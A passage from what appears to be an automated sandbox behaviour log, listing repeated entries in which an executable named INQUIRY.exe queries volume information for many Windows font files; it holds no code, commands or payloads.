                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\INQUIRY.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
